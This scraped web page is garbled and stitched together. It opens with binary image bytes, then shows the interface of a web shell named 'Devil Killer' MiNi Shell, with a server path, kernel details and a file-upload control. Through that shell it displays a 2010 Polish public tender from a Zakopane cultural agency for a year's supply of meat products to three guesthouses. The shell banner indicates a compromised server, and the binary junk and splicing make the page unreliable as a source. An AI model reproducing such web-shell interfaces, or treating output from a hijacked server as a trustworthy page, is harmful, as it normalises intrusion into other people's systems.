JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100722/221192-N-2010.html

<p class="kh_header"><b>Zakopane: Dostawę produktów żywnościowych, dla Tatrzańskiej Agencji Rozwoju Promocji i Kultury.</b><br>
<b>Numer ogłoszenia: 221192 - 2010; data zamieszczenia: 22.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tatrzańska Agencja Rozwoju Promocji i Kultury , Tetmajera 24, 34-500 Zakopane, woj. małopolskie, tel. 0-18 20-613-20, faks 0-18 20-739-94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tatry.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę produktów żywnościowych, dla Tatrzańskiej Agencji Rozwoju Promocji i Kultury..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem przetargu jest wybór Wykonawcy, który będzie dostarczał Zamawiającemu własnym transportem produkty żywnościowe określone we Wspólnym Słowniku Zamówień (CPV) jako:
główny przedmiot zamówienia: 
           15000000-8 (żywność, napoje, tytoń i produkty pokrewne)
oraz przedmiot zamówienia uzupełniający: 
15100000-9 (Produkty zwierzęce, mięso i produkty mięsne), 15119000-5 (Mięsa różne), 15131100-6 (Produkty mięsno-wędliniarskie), 

polegające na sukcesywnej dostawie produktów żywnościowych, do Domów Wczasowych, o których mowa w punkcie 3.6, 3.7 i 3.8 niniejszej SIWZ wg zestawienia przedstawionego poniżej w punkcie 3.6 , 3.7 i 3.8 SIWZ 
Zamawiający zastrzega, że dostarczony przedmiot zamówienia musi posiadać odpowiednie atesty lub świadectwa dopuszczające do spożycia zgodnie z obowiązującymi przepisami prawa, ponadto Zamawiający wymaga, aby Wykonawca załączył przy każdej dostawie handlowy dokument identyfikacyjny dla dostarczonych produktów lub inny podobny dokument zawierający dane wymagane do handlowego dokumentu identyfikacyjnego. 
Zamawiający zastrzega, że dostarczony przedmiot zamówienia musi spełniać:
- wymagania zawarte w ustawie o bezpieczeństwie żywności i żywienia ( Dz. U. nr 171, poz.1225 z późń. zm. ) oraz rozporządzeń wydanych na jej podstawie,
-  wymagania zawarte w rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z 21 listopad  
     2007 r. w sprawie znakowania środków spożywczych dozwolonych substancji  
     dodatkowych ( Dz. U. nr 219 poz. 1629.)

3.2.	Zamawiający zastrzega, że oferowany przedmiot Zamówienia musi posiadać odpowiednio długi okres ważności pozwalający na swobodne zużycie przez Zamawiającego. Ponadto Zamawiający wymaga, aby Wykonawca dostarczał towary w czystych plastikowych pojemnikach dopuszczonych do kontaktu z żywnością spełniających wymogi sanitarno - higieniczne. Dostarczone produkty żywnościowe musza być odpowiednio posortowane przez Wykonawcę i muszą być najwyższej jakości w tym przede wszystkim musza odpowiadać wymaganiom jakościowym stosownie do obowiązujących przepisów oraz muszą spełniać obowiązujące w tym zakresie normy sanitarno-epidemiologiczne a także musi być przechowywane i transportowane w warunkach gwarantujących najwyższą jakość.  

3.3.	Zamawiający zastrzega że realizacja dostaw przez czas trwania umowy będzie odbywać się sukcesywnie na podstawie zamówień częściowych składanych przez Kierowników poszczególnych DW o których mowa w punkach 3.6 , 3.7 i 3.8 SIWZ za pomocą faksu, telefonicznie, potwierdzonego niezwłocznie pismem. Zamawiający zastrzega, że Wykonawca dokona dostawy na własny koszt korzystając ze środka transportu spełniającego warunki określone w Ustawie o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 ( Dz.U. nr 171, poz. 1225)  oraz wszelkich wydanych na jej podstawie rozporządzeń.
Zamawiający zastrzega, że realizacja dostawy odbywać się będzie najdłużej w ciągu 48 godzin od złożenia zamówienia w godzinach od 8oo do 16oo w odpowiednich opakowaniach. W przypadku, gdy ostatni dzień dostawy wypada w dniu wolnym od pracy dostawa nastąpi w pierwszym dniu roboczym po wyznaczonym terminie

3.4.	Wymiana wadliwego towaru nastąpi w ciągu 24 godzin od złożenia reklamacji na koszt i ryzyko wykonawcy, gdy:
- dostarczono towar złej jakości,  
- dostarczono towar niezgodnie z umową, 
           -  dostarczono towar ze zwłoką
W przypadku, gdy ostatni dzień dostawy wypada w dniu wolnym od pracy dostawa nastąpi w pierwszym dniu roboczym po wyznaczonym terminie

3.5.	Zamawiający informuje, że podane poniżej w punktach 3.6 , 3.7 i 3.8 SIWZ ilości poszczególnych produktów będących przedmiotem niniejszego postępowania przetargowego są wielkościami wyliczonymi w sposób szacunkowymi w trakcie realizacji przedmiotowej usługi mogą ulec zmianie (zmniejszeniu) nie więcej niż o 20% w zależności od potrzeb Zamawiającego a w sytuacjach tego wymagających rezygnacja z całości niektórych pozycji. 

3.6.	Dostawa produktów żywnościowych do DW WANTA ul. Grunwaldzka 21, 34-500 Zakopane obejmuje produkty wymienione poniżej, a będące przedmiotem niniejszego postępowania, które muszą odpowiadać w minimalnym zakresie (może być wyższy lepszy) następującym wymogom, parametrom technicznym i jakościowym.

Lp.	              Rodzaj asortymentu	     J.m.	  ilość
1.	Parówki cocktailowe (lepszy gatunek)	kg	85
2.	Berlinki	kg	10
3.	Kiełbasa wiejska ( naturalna osłonka)	kg	53
4.	Kiełbasa toruńska lux	kg	105
5.	Kiełbasa krakowska podsuszana	kg	10
6.	Kiełbasa biała	kg	54
7.	Kiełbasa salami w przyprawach	kg	16
8.	Kiełbasa krakowska parzona wieprzowa	kg	30
9.	Kiełbaski śląskie	kg	13
10.	Kiełbasa śląska	kg	16
11.	Kiełbasa mielonka 	kg	30
12.	Salceson	kg	35
13.	Gulasz angielski	kg	22
14.	Boczek wiejski ( rolada) wieprzowy	kg	45
15.	Boczek wędzony	kg	140
16.	Szynka wiejska	kg	40
17.	Polędwica sopocka	kg	36
18.	Baleron	kg	29
19.	Szynka tradycyjna z beczki	kg	55
20.	Szynka konserwowa t nie gorszy niż typu sokołów 2500g lub równoważny	kg	50
21.	Kurczak w galarecie	kg	40
22.	Polędwica z warzywami	kg	25
23.	Szynka gotowana	kg	65
24.	Szynka starowiejska	kg	40
25.	Szynka tostowa w bloku	kg	44
26.	Kurczak pieczony w ziołach	     kg	       15
27.	Szynka z piersi indyka	     kg	       45
28.	Kabanos  wieprzowy	     kg	50
29.	Pasztetowa drobiowa	     kg	5
 30.	Kiełbasa podwawelska	      kg	45
 31.	Kiełbasa  żywiecka	      kg	35
 32.	Kiełbasa lisiecka	      kg	20
 33.	Kiełbasa galicyjska	      kg	15
 34.	Ogonówka domowa	      kg	25
 35.	Szynka z wędzarni	      kg	40
 36.	Schab cygański	      kg	38
 37.	Salceson prezesa	      kg	42
 38.	Szynka z wędzarni	      kg	30
 39.	Szynka z beczki	      kg	33
 40.	Szynka biała 	      kg	45
 41.	Pasztet pieczony w foremce 	      kg	50

Lp.	              Rodzaj asortymentu	     J.m.	  ilość
  1.	Indyk udziec	 kg	35
  2.	Indyk filet	 kg	100
  3.	Kurczak filet	 kg	155
  4.	Kurczak dramstyk	 kg	110
  5.	Kurczak nóżki	 kg	215
  6.	Kaszanka domowa	 kg	37
  7.	Kabanos drobiowy	 kg	5
  8.	Golonko wieprzowe	 kg	30
  9.	Gicze cielęce	 kg	30
10.	Kości wędzone	 kg	40
11.	Mięso wieprzowe schab b/kości	 kg	250
12.	Mięso wołowe gulasz	 kg	100
13.	Mięso wieprzowe polędwiczki	 kg	40
14.	Mięso wołowe antrykot	 kg	25
15.	Mięso wołowe exstra b/kości	 kg	150
16.	Mięso II wołowa	 kg	80
17.	Mięso II wieprzowa	 kg	100
18.	Mięso wieprzowe karczek b/kz	 kg	110
19.	Mięso wieprzowe łopatka b/k	 kg	140
20.	Mięso udziec cielęcy	 kg	30
21.	Żeberka	 kg	40
22.	Wątróbka drobiowa	 kg	20
23.	 Porcje rosołowe drobiowe	 kg	180
24.	 Smalec	 kg	20
25.	 Słonina	 kg	25
26.	 Kurczaki tusze	 kg	120
27.	 Mięso wieprzowe z szynki	 kg	65
30.	 Flaczki 	 kg	38
31.	 Rostbeff wołowy	 kg	80
32.	 Golonko peklowane	 kg	30
33.	 Gulasz cielęcy	 kg	30
35.	 Szynka z pieca pieczona	 kg	50

3.7.	Dostawa asortymentu do DW JASNY PAŁAC ul. Tetmajera 24, 34-500 Zakopane obejmuje produkty wymienione poniżej, a będące przedmiotem niniejszego postępowania, który musi odpowiadać w minimalnym zakresie (może być wyższy lepszy) następującym wymogom, parametrom technicznym i jakościowym:
		
Lp.	Rodzaj asortymentu	J.m.	ilość
1.		Baleron                                                               	kg        	150
2.		Boczek gotowany                                                 	kg     	70
3.		Boczek surowy                                                       	kg           	70
4.		Boczek wędzony                                                      	kg           	130
5.		Ćwiartka z kurczaka                                             	kg     	350
6.		Dramsztyki                                                            	kg            	80
7.		Filet z indyka                                                         	kg       	80
8.		Filet z kurczaka                                                     	kg       	420
9.		Flaki gotowane                                                                       	kg               	20
10.		Galaretka wieprzowa                                             	kg               	30
11.		Golonko wieprzowe surowe                                  	kg           	10
12.		Indyk gulasz	kg	40
13.		Kabanos                                                             	kg        	80
14.		Kark bez kości                                                                	kg       	200
15.		Kaszanka                                                               	kg              	50
16.		Kiełbasa biała                                                        	kg          	160
17.		Kiełbasa typu głogowska	kg	40
18.		Kiełbasa golonkowa                                              	kg              	30
19.		Kiełbasa  typu krakowska sucha                                                  	kg               	45
20.		Kiełbasa  typu Lisiecka                                       	kg           	20
21.		Kiełbasa  mortadela                                       	kg           	50
22.		Kiełbasa typu podwawelska                                   	kg        	240
23.		Kiełbasa typu swojska                                               	kg              	95
24.		Kiełbasa typu szynkowa                                                                                  	kg             	30
25.		Kiełbasa typu śląska                                                	kg              	140
26.		Kiełbasa  typu wiejska                                              	kg       	50
27.		Kiełbasa z gospody                                             	kg       	50
28.		Kiełbasa zwyczajna	kg        	90
29.		Kiełbasa typu żywiecka                                               	kg        	10
30.		Kiełbaski koktajlowe                                                                                                 	kg                	180
31.		Kości wędzone                                                      	kg              	20
32.		Kurczak                                                                  	kg         	50
33.		Łopatka bez kości                                                          	kg      	155
34.		Mięso mielone	kg	10
35.		Mięso szynka	kg       	200
36.		Mięso wołowe bez kości                                      	kg      	50
37.		Mięso wołowe z kością                                    	kg      	10
38.		Mięso II wołowe	kg	60
39.		Mięso II wieprzowe	kg	30
40.		Mięso gulasz wołowy	kg	30
41.		Ogonówka	kg	80
42.		Ozory wieprzowe                                                       	kg                	20
43.		Parówki gat. 1                                              	kg      	300
44.		Pasztetowa	kg	10
45.		Pasztet pieczony wiejski                                    	kg      	100
46.		Podgardle wędzone                                               	kg             	30
47.		Polędwica łososiowa                                                	kg	5
48.		Polędwica sopocka                                                	kg       	200
49.		Polędwiczki wieprz(mięso)                                              	kg       	20
50.		Porcje rosołowe drobiowe	kg	50
51.		Prosie pieczone	kg	30
52.		Rolada boczkowa                                                  	kg            	30
53.		Salami w przyprawach (lepszy gat.	kg	60
54.		Salceson wiejski                                                    	kg            	100
55.		Salceson drobiowy                                                    	kg            	20
56.		Schab bez kości                                                   	kg      	250
57.		Słonina surowa                                                     	kg         	40
58.		Szynka mielona	kg	35
59.		Szynka z gospody	kg	100
60.		Szynka tradycyjna                                                	kg        	50
61.		Szynka wędzona z kością ( peklowana)	kg	50
62.		Szynka wiejska                                                       	kg             	70
63.		Szynka wieprzowa konserw.                                              	kg            	170
64.		Szynka z indyka                                                    	kg              	30
65.		Wątroba drobiowa                                                 	kg          	20
66.		Wątroba wieprzowa                                              	kg         	10
67.		Żeberka wędzone                                                   	kg          	90
68.		Żeberka wieprzowe                                                	kg          	50

3.8.	Dostawa asortymentu do DW  JUREK ul. Zamoyskiego 27, 34-500 Zakopane obejmuje produkty wymienione poniżej, a będące przedmiotem niniejszego postępowania, który musi odpowiadać w minimalnym zakresie ( może być wyższy lepszy) następującym wymogom, parametrom technicznym i jakościowym:

Lp.	Rodzaj asortymentu	J.m.	ilość
1.		Baleron                                                               	kg        	120
2.		Boczek gotowany                                                 	kg     	56
3.		Boczek surowy                                                       	kg           	56
4.		Boczek wędzony                                                      	kg           	104
5.		Ćwiartka z kurczaka                                             	kg     	280
6.		Dramsztyki                                                            	kg            	64
7.		Filet z indyka                                                         	kg       	64
8.		Filet z kurczaka                                                     	kg       	304
9.		Flaki gotowane                                                                       	kg               	16
10.		Galaretka wieprzowa                                             	kg               	24
11.		Golonko wieprzowe surowe                                  	kg           	8
12.		Indyk gulasz	kg	32
13.		Kabanos                                                             	kg        	64
14.		Kark bez kości                                                                	kg       	160
15.		Kaszanka                                                               	kg              	40
16.		Kiełbasa biała                                                        	kg          	128
17.		Kiełbasa typu głogowska	kg	32
18.		Kiełbasa golonkowa                                              	kg              	24
19.		Kiełbasa  typu krakowska sucha                                                  	kg               	36
20.		Kiełbasa  typu Lisiecka                                       	kg           	16
21.		Kiełbasa  mortadela                                       	kg           	40
22.		Kiełbasa typu podwawelska                                   	kg        	192
23.		Kiełbasa typu swojska                                               	kg              	86
24.		Kiełbasa typu szynkowa                                                                                  	kg             	24
25.		Kiełbasa typu śląska                                                	kg              	112
26.		Kiełbasa  typu wiejska                                              	kg       	40
27.		Kiełbasa z gospody                                             	kg       	40
28.		Kiełbasa zwyczajna	kg        	72
29.		Kiełbasa typu żywiecka                                               	kg        	8
30.		Kiełbaski koktajlowe                                                                                                 	kg                	144
31.		Kości wędzone                                                      	kg              	16
32.		Kurczak                                                                  	kg         	40
33.		Łopatka bez kości                                                          	kg      	124
34.		Mięso mielone	kg	8
35.		Mięso szynka	kg       	160
36.		Mięso wołowe bez kości                                      	kg      	40
37.		Mięso wołowe z kością                                    	kg      	8
38.		Mięso II wołowe	kg	48
39.		Mięso II wieprzowe	kg	24
40.		Mięso gulasz wołowy	kg	24
41.		Ogonówka	kg	64
42.		Ozory wieprzowe                                                       	kg                	16
43.		Parówki gat. 1                                              	kg      	240
44.		Pasztetowa	kg	8
45.		Pasztet pieczony wiejski                                    	kg      	80
46.		Podgardle wędzone                                               	kg             	24
47.		Polędwica łososiowa                                                	kg	4
48.		Polędwica sopocka                                                	kg       	160
49.		Polędwiczki wieprz(mięso)                                              	kg       	16
50.		Porcje rosołowe drobiowe	kg	40
51.		Prosie pieczone	kg	24
52.		Rolada boczkowa                                                  	kg            	24
53.		Salami w przyprawach (lepszy gat.	kg	48
54.		Salceson wiejski                                                    	kg            	80
55.		Salceson drobiowy                                                    	kg            	16
56.		Schab bez kości                                                   	kg      	200
57.		Słonina surowa                                                     	kg         	32
58.		Szynka mielona	kg	28
59.		Szynka z gospody	kg	80
60.		Szynka tradycyjna                                                	kg        	40
61.		Szynka wędzona z kością ( peklowana)	kg	40
62.		Szynka wiejska                                                       	kg             	56
63.		Szynka wieprzowa konserw.                                              	kg            	136
64.		Szynka z indyka                                                    	kg              	24
65.		Wątroba drobiowa                                                 	kg          	16
66.		Wątroba wieprzowa                                              	kg         	8
67.		Żeberka wędzone                                                   	kg          	72
68.		Żeberka wieprzowe                                                	kg          	40.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.90.00-5, 15.13.11.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1)	Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ,1)	Oświadczenie Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik numer 3 do niniejszej SIWZ, 
- na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1)	Składanego przez Wykonawców do oferty przetargowej wykazu wykonanych lub wykonywanych dostaw odpowiadającym wymaganiom określonym w punkcie 9.1.2) SIWZ,2)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie (np. listy referencyjne) - sporządzone według wzoru stanowiącego załącznik numer 4 do SIWZ.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w składanym wykazie, o którym mowa w niniejszym punkcie wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej dwie dostawy, których wartość wynosiła minimum 60 000,00 zł brutto każda.
- na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1)	Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ,1)	Oświadczenie Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik numer 3 do niniejszej SIWZ, 
- na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1)	Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ,1)	Oświadczenie Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik numer 3 do niniejszej SIWZ, 
- na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia powyższego warunku będzie dokonana na podstawie:
1)	Składanego do oferty przetargowej przez Wykonawcę oświadczenia odpowiadającego wymaganiom określonym w punkcie 9.1.1) SIWZ,1)	Oświadczenie Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik numer 3 do niniejszej SIWZ, 
- na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- terminów realizacji przedmiotu zamówienia z powodu wystąpienia zdarzeń określanych jako siła wyższa, których nie można było przewidzieć w chwili podpisania niniejszej umowy i które nie wynikają z winy żadnej ze stron,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tatry.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Tatrzańska Agencja Rozwoju, Promocji i Kultury ul. Tetmajera 24, 34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 12:00, miejsce: Tatrzańska Agencja Rozwoju, Promocji i Kultury ul. Tetmajera 24, 34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





